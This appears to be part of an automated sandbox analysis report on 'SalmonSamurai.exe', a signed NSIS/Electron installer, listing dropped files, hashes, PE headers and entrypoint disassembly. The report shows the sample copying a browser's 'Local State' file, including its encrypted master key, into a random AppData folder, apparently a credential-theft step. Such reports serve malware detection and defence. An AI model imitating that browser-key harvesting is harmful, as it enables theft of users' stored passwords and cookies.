                                                                                                                                                                                                                                          Preview:....L+..H+..C+..{"files":{"node_modules":{"files":{"@isaacs":{"files":{"cliui":{"files":{"LICENSE.txt":{"size":731,"integrity":{"algorithm":"SHA256","hash":"2dc0465729366c3a7890dfa9e972a1ba7048a26c02116fb8b419a6a1ac110149","blockSize":4194304,"blocks":["2dc0465729366c3a7890dfa9e972a1ba7048a26c02116fb8b419a6a1ac110149"]},"offset":"0"},"build":{"files":{"index.cjs":{"size":10398,"integrity":{"algorithm":"SHA256","hash":"820aa357a7f6a022bfc3ac6ac19d1681921d0421cae898d5096423c0fb3b8607","blockSize":4194304,"blocks":["820aa357a7f6a022bfc3ac6ac19d1681921d0421cae898d5096423c0fb3b8607"]},"offset":"731"},"index.d.cts":{"size":1050,"integrity":{"algorithm":"SHA256","hash":"385fceba2f49ee3f91cd436d3f84b389375e1e8f86906b23f47df2e1b9c2b17b","blockSize":4194304,"blocks":["385fceba2f49ee3f91cd436d3f84b389375e1e8f86906b23f47df2e1b9c2b17b"]},"offset":"11129"},"lib":{"files":{"index.js":{"size":10100,"integrity":{"algorithm":"SHA256","hash":"e67b3446f47d4a672339c99bea9e987979da9fc70f421701814cb9d52ba176

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):107520
                                                                                                                                                                                                                                          Entropy (8bit):6.442687067441468
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:1bLnrwQoRDtdMMgSXiFJWcIgUVCfRjV/GrWl:1PrwRhte1XsE1l
                                                                                                                                                                                                                                          MD5:792B92C8AD13C46F27C7CED0810694DF
                                                                                                                                                                                                                                          SHA1:D8D449B92DE20A57DF722DF46435BA4553ECC802
                                                                                                                                                                                                                                          SHA-256:9B1FBF0C11C520AE714AF8AA9AF12CFD48503EEDECD7398D8992EE94D1B4DC37
                                                                                                                                                                                                                                          SHA-512:6C247254DC18ED81213A978CCE2E321D6692848C64307097D2C43432A42F4F4F6D3CF22FB92610DFA8B7B16A5F1D94E9017CF64F88F2D08E79C0FE71A9121E40
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..O..............h.......j.q.....k.....e......e......e.......zR........._...h......h.f.............h......Rich....................PE..L......W............................l........0....@.......................................@....................................P.......x.......................T.......p...............................@............0..$............................text............................... ..`.rdata...k...0...l..................@..@.data...............................@....gfids..............................@..@.rsrc...x...........................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\snapshot_blob.bin

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):273328
                                                                                                                                                                                                                                          Entropy (8bit):3.2521181832662194
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:MpeVehd7eASb6iAGm4hmWRSJTnBSki+TfUNp2Zg+TEJ0xEI2tWaw8MCZ72T04GO9:YdyNm4mWRSJTBSXsU1vJzbYB
                                                                                                                                                                                                                                          MD5:8915DD2A6D6B4EBF9A16C77FE063D8DE
                                                                                                                                                                                                                                          SHA1:A03132ADCB99A82BA269D56AB6577CCFD1BB08E5
                                                                                                                                                                                                                                          SHA-256:C1802B29B13663A8890031411270866834246931F71F41397682DD88FA16D485
                                                                                                                                                                                                                                          SHA-512:ABD93CDD634AD4D38B7E3714B183335CDDB9E3AD14660247CC7285066C95342AC8595D68CD0868B8512E73BB656AB54386045533F998576B2CD6501BF456CD2C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:............11.2.214.9-electron.0............................................;...b...........:..a........a........a........ar.......a........a..............Y.D............`$.........D............`$.......D............`$.......m.D............`$.........D............`D.........D............`$.......1.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....I.....@..F^......`.....(Jb....M.....@..F^..`.....H...IDa........D`....D`....D`.......D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.............................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\v8_context_snapshot.bin

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):588152
                                                                                                                                                                                                                                          Entropy (8bit):4.83735352889622
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:bFzofuYUahtcOm3A0Tg8zY8y4XrxXSIIBYgHi:JMfu/fTY8zrM9C7
                                                                                                                                                                                                                                          MD5:4CD37EA771EA4FE2F3AD46217CC02206
                                                                                                                                                                                                                                          SHA1:31680E26869B007E62550E96DBF846B3980D5B2B
                                                                                                                                                                                                                                          SHA-256:95F7B8664306DA8D0073A795E86590ED6FDAEDE5F489132E56C8779F53CF1ED5
                                                                                                                                                                                                                                          SHA-512:E1369734CBE17AAF6DD3CEEFB57F056C5A9346D2887A7D3EE7ED177386D7F5E624407869D53902B56AB350E4DED5612C3B0F52C2DD3EFA307E9947701068A2A0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.........c~.11.2.214.9-electron.0...........................................H...P<..........X...........a........a........aT.......ar.......a........a..............Y.D............`$.........D............`$.......D............`$.......m.D............`$.........D............`D.........D............`$.......1.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....I.....@..F^......`.....(Jb....M.....@..F^..`.....H...IDa........D`....D`....D`.......D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.....................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):5334528
                                                                                                                                                                                                                                          Entropy (8bit):6.335261874351837
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:98304:RKJSTu+985EkjstvgsnpkkHF3y/AFIB7:RQq85EkjstvgsnpkkJETB
                                                                                                                                                                                                                                          MD5:524B0D85D992F86A7F26C162F3DBB91C
                                                                                                                                                                                                                                          SHA1:BC9C862FD01F6134A0514DCB63F9FAB7A61CE269
                                                                                                                                                                                                                                          SHA-256:5B2FFB78FA963F2DEA5A7FCF7676FC3ABA243C4372D7528C8F1FC8F726D0A3FA
                                                                                                                                                                                                                                          SHA-512:422A18AF294D7551224E05F5F4F5DCFA51B3455C2E61FC285FD2B95B50274EB77FF317647E17B0E7D47459B4FED19C7C88C90E0878F2269A78D598B1196401D8
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......A..........;.......................................R...........`A..........................................L.~...&.L.P....`R.......P.<_...........pR.X}...L.......................L.(...@.A.@.............L.P............................text.....A.......A................. ..`.rdata...(....A..*....A.............@..@.data...p.....M.......M.............@....pdata..<_....P..`...LO.............@..@.00cfg..8.....Q.......P.............@..@.gxfg....,....R.......P.............@..@.retplne.....0R.......P..................tls....Q....@R.......P.............@..._RDATA..\....PR.......P.............@..@.rsrc........`R.......P.............@..@.reloc..X}...pR..~....P.............@..B................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader_icd.json

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):106
                                                                                                                                                                                                                                          Entropy (8bit):4.724752649036734
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                                                                                                                                                                                          MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                                                                                                                                                                          SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                                                                                                                                                                          SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                                                                                                                                                                                          SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\vulkan-1.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):928256
                                                                                                                                                                                                                                          Entropy (8bit):6.558092096809165
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24576:IEW7F7IyaHx/fempu2e6Z5WODYsHh6g3P0zAk7o:e7IyaBfempa6Z5WODYsHh6g3P0zAk7
                                                                                                                                                                                                                                          MD5:6D4ADF9A48DBCE2E480EF10B1338CA3C
                                                                                                                                                                                                                                          SHA1:CEB77D5768C6EDA84EC8E0B43821B8027764DE81
                                                                                                                                                                                                                                          SHA-256:4CCA7E6C05B2D988926E4B4D0C8FF91D6356F18DE8BF40B440251180E5CAD6A7
                                                                                                                                                                                                                                          SHA-512:106DB7309B40AFABB1CCA911B204C83129683DC116AEC198568C4228C581BF0DE5963BFFC0B50DF8F43EC355264F271FC383F4155BE45350C0D7DD429C7F7F09
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......................................................................`A........................................H...<!......P...............<o..............T...t.......................X...(...@...@............................................text............................... ..`.rdata..............................@..@.data....L...p... ...V..............@....pdata..<o.......p...v..............@..@.00cfg..8....0......................@..@.gxfg...P(...@...*..................@..@.retplne.....p...........................tls................................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..T...........................@..B................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj\Local State (copy)

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):389
                                                                                                                                                                                                                                          Entropy (8bit):5.669082967626313
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:YKWSg99rrt+s5fjfStzluBJTSQ5hRnL4vmy0xY:YKWfrrtz5fjfSCvT35hRLemy4Y
                                                                                                                                                                                                                                          MD5:4074AB5C25B53B8554C09B833158A791
                                                                                                                                                                                                                                          SHA1:78937E64D886192C815F8D946BCCDC34C15A26AC
                                                                                                                                                                                                                                          SHA-256:C9B2450CAE425900E9989F9BAC5817E88DC66CA1192D8EAC7F0E5174BC00190E
                                                                                                                                                                                                                                          SHA-512:9020BFBCDA5AFF23A49D2CB6F198A0F56DCF1B7CAE4634EDF46A088041ED7127D2D9B2BE4DC67C1AB6FC73BB5F673AA78D8D318E4AA09A812C3CCD2E05B18373
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMtjONeD74TY38J1prqXoNAAAAAAIAAAAAABBmAAAAAQAAIAAAAGa9UsdMNhDC5WHVBW39XsItp1wvDreEnUksCrEWizuUAAAAAA6AAAAAAgAAIAAAAG6VHELLUdl4t3RvqI12SIzjbjOhQ7WQLnYUe9KuOTWDMAAAAMOg5CwbBHMeY8cZDCxD2xOoma/UpriRN3t3gStyZadoIjhmPKIqQWP7KqvwN2B59kAAAADjPec7uTIt+B2MvBbUxi457iHx3X54SOfKVi991xzWGOb3N0n8LsSl9wk7qvaIc3NneniefWGNFa5XLztnHTJm"}}

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj\f6437bec-7fbd-4c30-809c-0d3908efe3f5.tmp

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):389
                                                                                                                                                                                                                                          Entropy (8bit):5.669082967626313
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:YKWSg99rrt+s5fjfStzluBJTSQ5hRnL4vmy0xY:YKWfrrtz5fjfSCvT35hRLemy4Y
                                                                                                                                                                                                                                          MD5:4074AB5C25B53B8554C09B833158A791
                                                                                                                                                                                                                                          SHA1:78937E64D886192C815F8D946BCCDC34C15A26AC
                                                                                                                                                                                                                                          SHA-256:C9B2450CAE425900E9989F9BAC5817E88DC66CA1192D8EAC7F0E5174BC00190E
                                                                                                                                                                                                                                          SHA-512:9020BFBCDA5AFF23A49D2CB6F198A0F56DCF1B7CAE4634EDF46A088041ED7127D2D9B2BE4DC67C1AB6FC73BB5F673AA78D8D318E4AA09A812C3CCD2E05B18373
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMtjONeD74TY38J1prqXoNAAAAAAIAAAAAABBmAAAAAQAAIAAAAGa9UsdMNhDC5WHVBW39XsItp1wvDreEnUksCrEWizuUAAAAAA6AAAAAAgAAIAAAAG6VHELLUdl4t3RvqI12SIzjbjOhQ7WQLnYUe9KuOTWDMAAAAMOg5CwbBHMeY8cZDCxD2xOoma/UpriRN3t3gStyZadoIjhmPKIqQWP7KqvwN2B59kAAAADjPec7uTIt+B2MvBbUxi457iHx3X54SOfKVi991xzWGOb3N0n8LsSl9wk7qvaIc3NneniefWGNFa5XLztnHTJm"}}

                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                          Entropy (8bit):7.999986641840123
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                          File name:SalmonSamurai.exe
                                                                                                                                                                                                                                          File size:74'023'200 bytes
                                                                                                                                                                                                                                          MD5:4ce4a1f912d0b9840a7f568454c6c45a
                                                                                                                                                                                                                                          SHA1:bbf41f3dee85e038f1cb4965269bb0f06b3bb27a
                                                                                                                                                                                                                                          SHA256:83679dfd6331a0a0d829c0f3aed5112b69a7024ff1ceebf7179ba5c2b4d21fc5
                                                                                                                                                                                                                                          SHA512:1583c31d11bf6d89e801398094222b6600cb610cffaed714e95415e887d31091dff0a386cec67ec0b23d519f5a662d899eb51533aff7327fbe7284573a904d2a
                                                                                                                                                                                                                                          SSDEEP:1572864:FQUvSCC8EhkQ2eCwxbjOcs1ecd3vXqL/PI2FS/oah2O:F54FhAsO11ec5yL/N0oah2O
                                                                                                                                                                                                                                          TLSH:8FF73366AFBD64C1F87330F5054A3993FB1A1B574B09EA3588F8BD9B049899C4F81E13
                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................h...".....

                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                          Icon Hash:adaeb397f36b6331

                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Entrypoint:0x403665
                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                          Time Stamp:0x660843F7 [Sat Mar 30 16:55:19 2024 UTC]
                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                          Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e

                                                                                                                                                                                                                                          Authenticode Signature

                                                                                                                                                                                                                                          Signature Valid:true
                                                                                                                                                                                                                                          Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                                                                                          Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                          Error Number:0
                                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                                          • 14/12/2024 08:21:02 06/12/2025 09:00:54
                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                          • CN=ELEFAR LLC, O=ELEFAR LLC, STREET="ul Polyany, 5A / korpus 1 pomeshch 7n", L=Moscow, S=Moscow, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1217700082577, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                                          Thumbprint MD5:3339AD8CCE8923C682D0E416361BF47B
                                                                                                                                                                                                                                          Thumbprint SHA-1:901F3FE4E599CD155132CE2B6BF3C5F6D1E0387C
                                                                                                                                                                                                                                          Thumbprint SHA-256:043C75759AB9230C929F661168CA533CC92EDF88D480EAFF3DCEB04C6BFC6AC4
                                                                                                                                                                                                                                          Serial:301385AA36FAE635E74BB88E

                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                          sub esp, 000003F8h
                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                                          pop edi
                                                                                                                                                                                                                                          xor ebp, ebp
                                                                                                                                                                                                                                          push 00008001h
                                                                                                                                                                                                                                          mov dword ptr [esp+20h], ebp
                                                                                                                                                                                                                                          mov dword ptr [esp+18h], 0040A230h
                                                                                                                                                                                                                                          mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                          call dword ptr [004080A0h]
                                                                                                                                                                                                                                          mov esi, dword ptr [004080A4h]
                                                                                                                                                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                          mov dword ptr [esp+4Ch], ebp
                                                                                                                                                                                                                                          mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                                                                                                                          mov dword ptr [esp+00000150h], ebp
                                                                                                                                                                                                                                          mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                                                                                                                          call esi
                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                          jne 00007FE58C4EF6AAh
                                                                                                                                                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                                          mov dword ptr [esp+34h], 00000114h
                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                          call esi
                                                                                                                                                                                                                                          mov ax, word ptr [esp+48h]
                                                                                                                                                                                                                                          mov ecx, dword ptr [esp+62h]
                                                                                                                                                                                                                                          sub ax, 00000053h
                                                                                                                                                                                                                                          add ecx, FFFFFFD0h
                                                                                                                                                                                                                                          neg ax
                                                                                                                                                                                                                                          sbb eax, eax
                                                                                                                                                                                                                                          mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                                                                                                                                          not eax
                                                                                                                                                                                                                                          and eax, ecx
                                                                                                                                                                                                                                          mov word ptr [esp+00000148h], ax
                                                                                                                                                                                                                                          cmp dword ptr [esp+38h], 0Ah
                                                                                                                                                                                                                                          jnc 00007FE58C4EF678h
                                                                                                                                                                                                                                          and word ptr [esp+42h], 0000h
                                                                                                                                                                                                                                          mov eax, dword ptr [esp+40h]
                                                                                                                                                                                                                                          movzx ecx, byte ptr [esp+3Ch]
                                                                                                                                                                                                                                          mov dword ptr [00429B18h], eax
                                                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                                                          mov ah, byte ptr [esp+38h]
                                                                                                                                                                                                                                          movzx eax, ax
                                                                                                                                                                                                                                          or eax, ecx
                                                                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                                                                          mov ch, byte ptr [esp+00000148h]
                                                                                                                                                                                                                                          movzx ecx, cx
                                                                                                                                                                                                                                          shl eax, 10h
                                                                                                                                                                                                                                          or eax, ecx
                                                                                                                                                                                                                                          movzx ecx, byte ptr [esp+0000004Eh]

                                                                                                                                                                                                                                          Rich Headers

                                                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000xbff0.rsrc
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x4695db80x2368
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                          .text0x10000x66d70x68004e97e586f167bf2d2eddcdba22e25c0eFalse0.6615835336538461data6.441769857560007IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .data0xa0000x1fb780x600e411b225ac3cd03a5dad8143ae82958dFalse0.5091145833333334data4.122928093833695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                          .ndata0x2a0000x1c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                          .rsrc0x460000xbff00xc000951d482944a10118ca7b1c23ecd70b02False0.7726847330729166data6.87682750773503IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                          RT_ICON0x462b00x8f8dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9947209447876133
                                                                                                                                                                                                                                          RT_ICON0x4f2400xea8dataEnglishUnited States0.007196162046908316
                                                                                                                                                                                                                                          RT_ICON0x500e80x8a8dataEnglishUnited States0.01128158844765343
                                                                                                                                                                                                                                          RT_ICON0x509900x568dataEnglishUnited States0.014450867052023121
                                                                                                                                                                                                                                          RT_ICON0x50ef80x468dataEnglishUnited States0.015957446808510637
                                                                                                                                                                                                                                          RT_ICON0x513600x2e8dataEnglishUnited States0.020161290322580645
                                                                                                                                                                                                                                          RT_ICON0x516480x128dataEnglishUnited States0.04391891891891892
                                                                                                                                                                                                                                          RT_DIALOG0x517700x202dataEnglishUnited States0.4085603112840467
                                                                                                                                                                                                                                          RT_DIALOG0x519780xf8dataEnglishUnited States0.6290322580645161
                                                                                                                                                                                                                                          RT_DIALOG0x51a700xeedataEnglishUnited States0.6302521008403361
                                                                                                                                                                                                                                          RT_GROUP_ICON0x51b600x68dataEnglishUnited States0.23076923076923078
                                                                                                                                                                                                                                          RT_MANIFEST0x51bc80x423XML 1.0 document, ASCII text, with very long lines (1059), with no line terminatorsEnglishUnited States0.5127478753541076

                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                          ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                                                                                                                                                                          SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                                                                                                                                                                          ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                                                                                                                                                                          COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
